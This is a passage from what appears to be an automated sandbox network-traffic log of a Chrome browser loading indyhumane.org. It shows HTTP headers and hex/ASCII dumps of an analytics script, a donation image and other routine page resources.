                                                                                                                                                                                                                                                        Data Ascii: <n6.lSXx,?sK0VV5+2loOoW\/EA)YKAa<=L7<*ms[ET 8=0(7.H,?q;.:@6!&ptA'W;vL@pL b Hv-:_=h=n^R+mo-wQ/GUJ~gzn>Y&-Q
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 2d c0 1e b0 29 63 af 8b 92 b8 76 72 a6 d2 1e 15 42 56 03 84 2a 00 10 01 eb 6d 75 ab a1 05 cf c8 0a 0a a7 eb 84 3c 25 ac 69 15 97 a2 44 1a 98 20 81 26 20 6a 59 db b4 cf cb ca c2 e9 92 cf 28 fc 70 a7 2c 0e 8c f8 08 48 9d 49 43 da ab c2 93 69 c9 bb e7 54 b8 fb ab 83 96 83 3a e2 bb ea 9c e0 59 5a f9 02 7a dd fe fd 14 c8 6c 00 d2 48 98 8c 79 ba c5 b8 d2 0f 63 45 c3 ce b8 fa 18 b6 60 3b 12 d1 1e dd b2 a1 b7 fc e1 ac ae 2b d1 42 d9 d6 0e 53 a0 52 22 a4 cb 8c f9 db 55 ac 83 7a 76 70 ba 84 b3 83 76 76 38 78 90 bc 3a 9d 29 d5 95 be 3d 8d ee c9 79 6a bf 31 57 c1 6e ee 1d 36 bc 69 53 55 37 9e a3 eb 27 ea 2b 15 88 bc c2 f2 8b 02 15 02 90 30 5d 26 80 81 79 cd b8 fe e3 1d eb b2 62 f9 79 d7 33 85 2b 6e 7f fc c4 ed cf 0f fc f9 ff fd 9f 98 ae a2 0c 20 22 5c ff f1 86 34 4f
                                                                                                                                                                                                                                                        Data Ascii: -)cvrBV*mu<%iD & jY(p,HICiT:YZzlHycE`;+BSR"Uzvpvv8x:)=yj1Wn6iSU7'+0]&yby3+n "\4O
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 8f 5c 00 1a 6b 13 f7 19 dd 97 26 c7 75 e7 ea 76 61 ae 2b d5 f5 f2 6f 17 9f 3e 78 a4 95 7f 79 8a ee a3 a6 09 37 66 f9 14 30 dc 35 cd 87 f5 65 9a c4 86 68 0f db e7 e5 3f de a4 4e 53 fa 56 8d 36 51 f9 49 8d 55 10 40 65 19 b4 7b b6 1c 08 d2 76 8d 8c 98 ef c3 67 5d 9f 49 91 9e bb cb 68 47 e0 b2 bc 7a 60 7d 4f f1 f4 4b da fd b7 49 66 f5 96 d4 0e 09 3b 31 74 a2 08 b2 e1 31 21 38 58 94 2d ca 68 b4 22 d0 44 30 0b b3 6b 94 cd 45 14 ec 81 65 e4 9a 88 8c 75 59 fd ac 54 09 22 a3 eb 93 a5 01 c9 1a 08 06 e7 4b a0 8b f0 70 f9 cc 00 d6 d5 cf c5 d0 87 b4 6d b9 2e 02 06 2f 2b f2 9a 40 29 17 2d 77 36 e6 cc d5 5a 1f a5 67 b4 de 9b bc 0d 18 1c e5 e5 b8 d6 fd b1 95 d1 df fb c3 b3 b2 bd 8a e2 dc 1f b8 37 5a dd 06 66 f7 40 80 d0 10 54 63 e3 de 06 18 04 3f a0 d2 f6 e7 80 61 23 cd
                                                                                                                                                                                                                                                        Data Ascii: \k&uva+o>xy7f05eh?NSV6QIU@e{vg]IhGz`}OKIf;1t1!8X-h"D0kEeuYT"Kpm./+@)-w6Zg7Zf@Tc?a#
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: b7 3f 3f dc 8b 22 af 19 df 6e 2b 2e ff 78 93 a8 b3 d7 19 e0 0b d2 2c 75 cb 51 01 aa f6 6a ec 46 bc 3a 67 d3 d7 3d 1e dc 75 87 0e e3 ba a7 0c 6e eb 90 c1 2a d6 b7 48 37 c2 d9 c2 01 db d3 a5 d1 af cb 74 a5 9b a6 38 cd e9 c9 99 35 1d e2 fa 95 ae 43 ae 69 e8 a6 5e f6 f1 8e 47 20 5f 9d ea a0 32 03 a1 b9 28 99 79 7b de 30 0a d2 67 2c 4f 5e 16 6a ad cf 5e 7e 22 50 7e 1e 14 9e 7a d6 c9 d3 82 c2 b1 66 b2 49 41 68 f5 89 3e d3 fa b8 a8 e2 66 08 2f a5 0d 0f 04 20 88 cd 1a 7d 74 c6 ba f8 17 a7 ca 75 a7 62 fa 26 bc ee cc 29 c5 b1 2b cf da cd 7b 78 56 e4 8b d3 be a5 72 ef 43 14 4b 8e 07 89 81 f7 b1 05 83 54 7c f2 ca f7 7b 60 f0 70 69 04 41 e5 93 c9 85 3a 13 c4 38 3c d4 3d e1 ee 7f f6 01 87 05 51 9a b3 fd 39 6e 7a f8 d3 f6 fa 7f 4e 60 78 f6 0c 8b 09 f6 43 92 00 e8 b9 bb
                                                                                                                                                                                                                                                        Data Ascii: ??"n+.x,uQjF:g=un*H7t85Ci^G _2(y{0g,O^j^~"P~zfIAh>f/ }tub&)+{xVrCKT|{`piA:8<=Q9nzN`xC
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 8e e2 db 3c bb ed 6e fa 78 00 a2 1c 64 6c ca ff 3c 33 7c 14 14 96 26 d5 e3 c1 dd e7 f6 7a 0b fa 1d 0c b6 e3 1c f2 c1 c0 5e 10 7a fd 5d dd 8d 72 df a0 9d a5 5d 2d e8 12 97 f1 e6 52 7f 42 89 42 39 bf cd 48 d7 d6 32 98 5c b1 f8 30 58 6a 79 4b b4 10 bd 9a 8e 36 04 ff a9 33 fb 26 bf bc b0 59 75 f1 01 dc e8 de 2a b2 7e 38 0a 65 fb a9 51 02 00 d8 06 43 56 ac 66 b1 31 a4 0a 1d 8c 66 6f 79 00 b9 49 dc fc e7 f7 0b ae bf bf 61 f9 97 6f 78 ff f3 77 7c fc 51 5c 47 79 95 e0 5c f7 1f 76 56 5c 15 07 17 55 1e 5c a6 e0 59 01 e7 07 29 95 d0 9c 9c 18 9c 95 3f 27 f1 0e 11 e5 9b ad 77 fd dc 02 97 86 bb 85 23 bf 3f 4a 1c 94 1e d6 fb 02 96 03 b0 74 59 bc 96 73 5d 0d da 5a 15 1b ba 52 59 41 fb 0d 29 bf da 2a aa 68 27 60 16 7b 8a 9f 50 04 b1 85 16 09 28 3c 90 3b 6c aa bf 80 31 11
                                                                                                                                                                                                                                                        Data Ascii: <nxdl<3|&z^z]r]-RBB9H2\0XjyK63&Yu*~8eQCVf1foyIaoxw|Q\Gy\vV\U\Y)?'w#?JtYs]ZRYA)*h'`{P(<;l1
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 23 c3 d4 03 83 d1 25 74 08 06 63 19 46 10 4f d4 bb db b6 23 ed bd e6 19 d0 37 65 22 03 e2 e7 8c 25 02 42 e8 a1 f9 50 b7 96 1f c3 74 ef a5 e1 74 06 26 f0 77 01 83 a6 c9 7e c4 1d f4 85 0d 80 57 ea 6b 2b f9 7d 84 55 84 42 75 3b cb ba f6 d4 b9 50 e9 8f 9c 1d cc 4b 16 c1 e3 b6 48 60 99 75 05 f3 5c ad 01 17 62 10 84 1a 13 68 18 00 a6 ba 8d 3a f7 be 84 ee 6b 7d f7 e1 7d 15 6b e1 bc 62 4d d2 fe bc 64 9d df ac 9a 58 75 4f 3d 61 69 36 65 5d 45 57 ff 6e 60 d0 d2 89 25 5c 05 9c 19 d0 c7 33 6b ce 78 ef 3e bb 8c 9a 82 13 63 e6 74 e3 28 5f 99 17 6d c6 b6 7d 34 fa a3 cd 58 35 b1 5b 17 c0 0f 05 22 29 74 0e dd 3e b9 cb 58 ee 7c a8 ca 08 03 82 f2 77 76 c1 97 83 90 9d c3 15 2f 76 76 d0 c1 a0 6e 2c 39 53 36 61 52 b7 6f 3f 03 3c c5 eb 63 e8 73 3c af 43 ef 0f 41 e1 a0 a8 87 bd
                                                                                                                                                                                                                                                        Data Ascii: #%tcFO#7e"%BPtt&w~Wk+}UBu;PKH`u\bh:k}}kbMdXuO=ai6e]EWn`%\3kx>ct(_m}4X5[")t>X|wv/vvn,9S6aRo?<cs<CA


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        93192.168.2.44985544.219.163.774432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC520OUTGET /track.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.gaug.es
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC256INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        ETag: "65f04ae5-ef5"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 12 Mar 2024 12:30:29 GMT
                                                                                                                                                                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 3829
                                                                                                                                                                                                                                                        Connection: Close
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC3829INData Raw: 76 61 72 20 5f 67 61 75 67 65 73 3d 5f 67 61 75 67 65 73 7c 7c 5b 5d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 28 5f 67 61 75 67 65 73 5b 27 73 6c 69 63 65 27 5d 29 3f 5f 67 61 75 67 65 73 2e 73 6c 69 63 65 28 30 29 3a 5b 5d 3b 5f 67 61 75 67 65 73 3d 7b 74 72 61 63 6b 5f 72 65 66 65 72 72 65 72 3a 74 72 75 65 2c 69 6d 61 67 65 3a 6e 65 77 20 49 6d 61 67 65 28 29 2c 74 72 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 74 43 6f 6f 6b 69 65 28 27 5f 67 61 75 67 65 73 5f 63 6f 6f 6b 69 65 27 2c 31 2c 31 29 3b 76 61 72 20 61 3d 74 68 69 73 2e 75 72 6c 28 29 3b 69 66 28 61 29 7b 74 68 69 73 2e 69 6d 61 67 65 2e 73 72 63 3d 61 3b 76 61 72 20 62 3d 36 30 2a 36 30 2c 66 3d 62 2a 32 34 2c 63 3d 66 2a 33 31 2c 64 3d 66 2a 33 36 35
                                                                                                                                                                                                                                                        Data Ascii: var _gauges=_gauges||[];(function(){var h=(_gauges['slice'])?_gauges.slice(0):[];_gauges={track_referrer:true,image:new Image(),track:function(){this.setCookie('_gauges_cookie',1,1);var a=this.url();if(a){this.image.src=a;var b=60*60,f=b*24,c=f*31,d=f*365


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        94192.168.2.449863192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC390OUTGET /wp-content/uploads/2023/06/donate.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 562791
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/donate.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 15 Jun 2023 23:56:53 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC779INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 84 00 00 02 75 08 06 00 00 00 81 f7 3e 33 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRu>3gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 5d 48 23 f2 2d 72 14 39 8d 5c 40 fa 90 db c8 20 32 8a fc 8a bc 47 31 94 81 b2 51 03 d4 02 75 40 b9 a8 1f 1a 8a c6 a0 73 d1 74 34 0f 5d 80 96 a2 6b d1 1a b4 1e 3d 80 b6 a2 a7 d1 4b e8 75 74 00 7d 8a 8e 63 80 d1 31 0e 66 8c d9 61 5c 8c 87 45 60 89 58 1a 26 c7 16 63 e5 58 35 56 8f 35 63 1d 58 37 76 15 1b c0 9e 61 ef 08 24 02 8b 80 13 ec 08 5e 84 10 c2 6c 82 90 90 47 58 4c 58 43 a8 25 ec 23 b4 12 ba 08 57 09 83 84 31 c2 27 22 93 a8 4f b4 25 7a 12 f9 c4 78 62 3a b1 90 58 46 ac 26 ee 21 1e 21 9e 25 5e 27 0e 13 5f 93 48 24 0e c9 92 e4 4e 0a 21 25 90 32 49 0b 49 6b 48 db 48 2d a4 53 a4 3e d2 10 69 9c 4c 26 eb 90 6d c9 de e4 08 b2 80 ac 20 97 91 b7 90 0f 90 4f 92 fb c9 c3 e4 b7 14 3a c5 88 e2 4c 09 a2 24 52 a4 94 12 4a 35 65 3f e5 04 a5 9f 32 42 99 a0 aa 51 cd a9
                                                                                                                                                                                                                                                        Data Ascii: ]H#-r9\@ 2G1Qu@st4]k=Kut}c1fa\E`X&cX5V5cX7va$^lGXLXC%#W1'"O%zxb:XF&!!%^'_H$N!%2IIkHH-S>iL&m O:L$RJ5e?2BQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac db f2 a1 36 a3 f6 7a 9d 7f 5d cb 56 fd ad ab b7 be d9 26 da d6 bf dd 77 7b f3 0e 83 1d 15 3b de ef 94 ec bc b5 2b 78 57 6b bd 45 7d f5 6e d2 ee 82 dd 8f 1a 62 1b ba bf e6 7e dd b8 47 77 4f c5 9e 8f 7b a5 7b 07 f6 45 ef eb 6a 74 6f 6c dc af bf bf b2 09 6d 52 36 8d 1e 48 3a 70 e5 9b 80 6f da 9b ed 9a 77 b5 70 5a 2a 0e c2 41 e5 c1 27 df a6 7c 7b e3 50 e8 a1 ce c3 dc c3 cd df 99 7f b7 f5 08 eb 48 79 2b d2 3a bf 75 ac 2d a3 6d a0 3d a1 bd ef e8 8c a3 9d 1d 5e 1d 47 be b7 ff
                                                                                                                                                                                                                                                        Data Ascii: ZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[6z]V&w{;+xWkE}nb~GwO{{EjtolmR6H:powpZ*A'|{PHy+:u-m=^G
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 76 81 c9 cb 4c d6 e6 b8 f6 f2 b0 71 98 c9 9f 5d d8 5d a5 aa 94 b9 32 42 23 da 3f e9 90 34 59 0f cd 0a ff 7c a7 cc 5e 8d cd 9c f6 cf d8 17 91 fe ac e0 b8 63 43 a4 06 3c e8 4d 37 d1 dc e7 7c 1d fe d9 32 9e da 12 0c 9e 38 83 96 a6 0e ff 3f 2d c5 76 fb d1 02 db f5 35 f2 45 36 41 77 cf 68 67 32 f9 f9 e9 c9 bc 1d 3e de 4d f7 5d f9 15 70 52 fb d6 24 f7 95 7e fe a7 e1 55 1a fe 48 78 aa 03 70 12 89 a6 91 59 46 e0 d8 fe aa 12 83 b3 f7 d8 79 4f 0c e0 6e 28 1b ab 38 7e b5 06 2b 91 39 44 7c e5 a6 d3 e7 0a ac b6 9a 46 33 7a 33 0d 8a 8f c7 ad 0c 8a 2a d3 d8 34 55 86 f7 65 cc 18 22 67 16 21 13 50 43 31 70 45 b2 0b 48 25 5b e5 1c 71 c6 39 37 2f 19 af b0 d5 42 d6 0e ab 99 ff 6a 7a 96 9f 41 85 4f 4a 88 3f 37 25 ba d5 99 11 ff b3 df 54 49 84 3e dc bd 8a a5 b3 b7 8b 25 0a 6c
                                                                                                                                                                                                                                                        Data Ascii: vLq]]2B#?4Y|^cC<M7|28?-v5E6Awhg2>M]pR$~UHxpYFyOn(8~+9D|F3z3*4Ue"g!PC1pEH%[q97/BjzAOJ?7%TI>%l
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 57 93 07 d1 24 e7 1d 58 19 f9 2b 05 f9 5d 46 e2 d2 29 0c 68 b1 bf f8 1c e5 a9 4c 1a 73 dc cf 9d c1 6c 45 b0 ca 6b b3 f1 e6 6d 23 d4 dd 0c 4f 75 2b 35 cd bf d1 0c 3b 7c fb dd 32 7e e9 78 12 67 50 e1 ae 9c d5 3e c8 8e 16 55 60 75 f6 cd a7 8d 5e c4 55 84 c9 99 ec 9d e5 b9 0b 4c 8e ac 64 cb 77 da ed f3 ea 6d 6e 3b 1e ef dc 29 bc e2 fb 0d 3a c0 07 f8 ae 31 c1 e4 90 75 06 45 82 15 c2 a7 33 e5 b6 d0 67 b3 2b e7 af 69 e4 ca f9 c2 08 0f 02 53 94 22 b5 59 c5 28 9e 2b 9d 78 5b 69 96 2f 2b 67 2e 63 0f a6 8b 70 4c 67 45 ed f2 f7 00 95 99 43 ea ec b9 f8 fc 6c d2 6a 6f 78 34 29 11 d1 b7 32 44 58 da 55 ba 0a ac fa 90 4d a4 34 16 f9 01 88 8c fd 2c 7d 35 f2 57 dd ba e9 60 51 81 c8 30 db 05 e6 04 3e 75 0c 77 0c 8d 08 ee f6 5f d5 39 a4 f8 be c1 13 fe e4 78 e3 f8 87 ac 88 c6
                                                                                                                                                                                                                                                        Data Ascii: W$X+]F)hLslEkm#Ou+5;|2~xgP>U`u^ULdwmn;):1uE3g+iS"Y(+x[i/+g.cpLgECljox4)2DXUM4,}5W`Q0>uw_9x
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 59 0d cf 60 c7 20 ac 8c 7d 1b b6 35 20 02 a8 18 f3 fc e5 33 90 3b 74 45 cf 6f 03 67 06 59 f5 22 67 30 6b 3f 26 83 32 83 02 9d 9c 2a a0 32 a9 2a 53 4d f3 02 85 17 f9 17 ab 95 c3 28 74 e5 ec dd 81 27 ed 85 50 71 0e 23 b9 e1 9c 05 c3 1c 8c 4f b6 60 c7 22 ba 01 f1 cc 7e 6d 96 01 6d 11 66 e4 3c a1 e7 13 a0 f6 48 04 6c 75 ca f5 2f 11 be d6 29 84 a8 25 b4 eb 37 bf c3 c0 a7 89 27 28 c6 79 b4 d9 91 f1 fa fe f9 19 35 5d 1d bc ca 9e e2 f3 f7 6a dc af 80 9a dd b1 d7 5e be 8f 38 fe 68 d5 f7 92 19 c0 af 9f d0 07 95 b8 4f f4 07 73 6d b2 ed c5 df 28 da 96 f8 fd 98 e2 b2 df c9 75 0d ab 89 c6 25 3d 91 23 68 df bb 6c ac 10 56 0a fe 95 83 0e 95 9f 12 11 79 d6 73 fe b8 86 95 ed 9c 22 eb fa 46 4a 99 7b f0 5a 81 36 6d e5 5c d7 85 d3 14 0d 86 ea 8d 61 d7 96 d1 f6 39 87 ee bb f2
                                                                                                                                                                                                                                                        Data Ascii: Y` }5 3;tEogY"g0k?&2*2*SM(t'Pq#O`"~mmf<Hlu/)%7'(y5]j^8hOsm(u%=#hlVys"FJ{Z6m\a9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 33 7d 99 32 ca f2 af 18 24 73 a0 90 de 2a b0 95 c1 27 8e e0 ca 01 ac 85 81 12 22 48 99 31 3c 6d 11 96 59 60 54 20 33 30 99 30 ba b3 5a 58 29 33 8a 5f 29 8f cc 51 d8 e9 cf 8f 1b d1 4c 72 6f 66 65 a8 ca 10 24 ce 9c c1 1d 07 31 33 d2 98 33 fb a9 76 dd 69 83 aa 13 93 dd 48 8c 66 59 e5 5c dd 27 b6 f3 30 3e ae ac 4e 66 e7 35 24 78 c7 f2 7e 35 e4 db 9e 19 4f e5 4e 21 75 06 31 22 a5 67 fd bc ca 5b e5 00 1c 8f 78 2e 86 39 83 3b 63 d7 d2 c2 da 6b 6b bb 79 01 76 26 4f 56 67 f9 50 cf 89 48 ba 12 da 4c 3c cb 37 f3 7e ec 14 32 f0 b6 42 7d 95 d1 e6 5d b5 ca 5d 39 79 6f 3b e6 9c 67 a5 7b ab 61 3b 65 de 01 a6 63 30 4e 1d c3 cc 29 64 f9 11 d7 1d bb ca e1 40 5b 8d 38 87 08 d9 a7 19 b2 f1 1c 8d a9 8a 53 b8 8a bb d3 73 56 66 55 f2 d7 ed d6 03 32 47 96 bd 7f 49 0f 04 4b f0 86
                                                                                                                                                                                                                                                        Data Ascii: 3}2$s*'"H1<mY`T 300ZX)3_)QLrofe$133viHfY\'0>Nf5$x~5ON!u1"g[x.9;ckkyv&OVgPHL<7~2B}]]9yo;g{a;ec0N)d@[8SsVfU2GIK
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 1d e7 f0 ae 63 98 6d 6b 16 89 7d 96 9d 32 a2 30 37 31 69 7d 85 36 b7 65 c5 a6 c6 77 74 9e 5d 3c 8e 99 45 3b d8 34 ec d2 4c 96 f7 2d c7 24 4c fa 1d 42 eb 58 f1 59 04 64 f2 b9 29 22 86 7d 6a 20 ab b0 c9 be 37 c8 68 1d f9 0d f3 17 1a 78 05 d4 f9 25 8e a9 1d 40 3a a8 e6 81 b9 86 6c 06 64 c7 f1 9b 8d 0a e5 9a f6 91 19 17 8b 93 6d 35 8e a0 b2 d2 f0 ab 81 09 cb 52 be 3f c8 29 ac 6c d1 aa 86 7f 1b 2c a4 28 73 b8 77 c7 0a cd 58 88 7e e2 98 b1 67 f6 7e 17 3f b6 01 9b c4 10 79 66 20 ee d2 f4 99 44 49 76 63 98 88 e4 32 77 6a 1f 08 c8 66 7a 47 d8 f7 b6 1d 1a 01 55 19 bb 3c 0f 17 95 15 54 27 9a 8c a8 4e 94 ac 26 5c 22 88 da 3b 73 08 56 f8 d0 a1 d8 5f f9 f5 ba b0 3a 99 59 61 6d 74 d8 57 b8 ee 70 df ce 71 87 a9 4c b0 83 ee 3a 5f 99 51 1e 39 88 c8 fb e8 a8 08 84 3f 71 30
                                                                                                                                                                                                                                                        Data Ascii: cmk}2071i}6ewt]<E;4L-$LBXYd)"}j 7hx%@:ldm5R?)l,(swX~g~?yf DIvc2wjfzGU<T'N&\";sV_:YamtWpqL:_Q9?q0
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 59 ea 6a d9 1b db 2c 7d 45 b6 dc b1 39 76 fa f4 8e 5d c3 56 1a 96 17 dc 04 85 4c 7d 1e 38 f1 76 4c 67 f2 75 77 fc fd 21 7a 4f 02 3d 17 b4 45 f6 e9 2f 7e 1f 86 b7 5f 3e 0d 54 9e 04 8e bc 7d 4f 1d 23 c2 43 ab 0b 84 98 8d 86 df 2f c4 76 28 d1 d2 7d f9 77 da 31 db 1a 1d 8d 05 2b 3f eb 76 c7 1e 65 58 a7 ac 9c f8 96 d1 ab f0 f3 5d 3d e0 d4 39 9c 9d c2 ca f9 c2 27 ca ea 09 3c 71 f6 ee 94 51 75 0e 97 07 67 a5 d7 be cf 92 94 9e 29 b7 b7 e8 4c cf 48 ab 7f 9b 34 b7 14 cd be 5b 69 71 66 4e e2 6c c8 7a e7 70 8a 07 a6 fc 14 9f a0 f0 88 0c 6c 71 e1 b9 53 4e cb 81 fe fd 15 bc 8e 67 1b 99 33 41 15 c9 a7 89 8b 8c 03 52 64 c9 81 86 c0 74 8b 4e 52 76 66 ec 66 60 c7 47 96 e6 3b 00 c7 4f f4 2e 10 5e c1 f9 69 60 b4 58 1d 71 84 d5 5a 9e dd 50 18 97 cb 63 a3 f1 20 e4 5d c8 3b 2b
                                                                                                                                                                                                                                                        Data Ascii: Yj,}E9v]VL}8vLguw!zO=E/~_>T}O#C/v(}w1+?veX]=9'<qQug)LH4[iqfNlzplqSNg3ARdtNRvff`G;O.^i`XqZPc ];+
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e4 14 66 02 2d 02 a6 4c 56 fd 17 f1 7e 46 62 15 be a5 df be 99 19 2a e3 b9 d2 27 99 51 b4 72 0a bd 51 bd 5e e5 a9 4e d0 35 f8 b5 34 b1 74 11 0e 1c 1f b8 45 c8 9e 43 c4 32 9c 3c 4b 0a 42 bd b3 3a 8e f1 09 f8 14 be 4f 39 2f 56 e6 44 69 10 9e 9c 0f 5b e5 ad e0 ce 1c 29 96 06 c7 c4 13 a8 dc c9 10 d1 74 07 d0 f9 45 dd 3d d2 cd 13 fe b6 be 2b 99 13 b5 69 86 c3 d3 d9 e0 7d 0d 99 de d8 b1 a5 30 cf c0 bb f8 c8 7b 1b bf d1 e7 74 34 2d d5 d7 a6 02 9e f7 e2 cf 7a ed ac 56 4d 8e 68 33 63 96 a0 c9 fa b0 92 86 d9 03 b3 af 30 e7 a9 d2 81 e0 78 5b 6d b1 9e cb 80 ec d3 16 2c cd 51 4e 3b cb 99 29 8b e4 9b dd 16 9a a7 1d bf 59 bd ab 5b 99 e9 19 c2 ef b0 47 98 42 b5 e5 b1 19 82 08 2c e3 5c 38 0b 0a f8 c8 0b fb 7f 8d 52 de 35 1c 11 b2 f4 15 21 12 29 94 95 71 53 89 5b 1a cb e0
                                                                                                                                                                                                                                                        Data Ascii: f-LV~Fb*'QrQ^N54tEC2<KB:O9/VDi[)tE=+i}0{t4-zVMh3c0x[m,QN;)Y[GB,\8R5!)qS[


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        95192.168.2.449864157.240.0.64432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC535OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
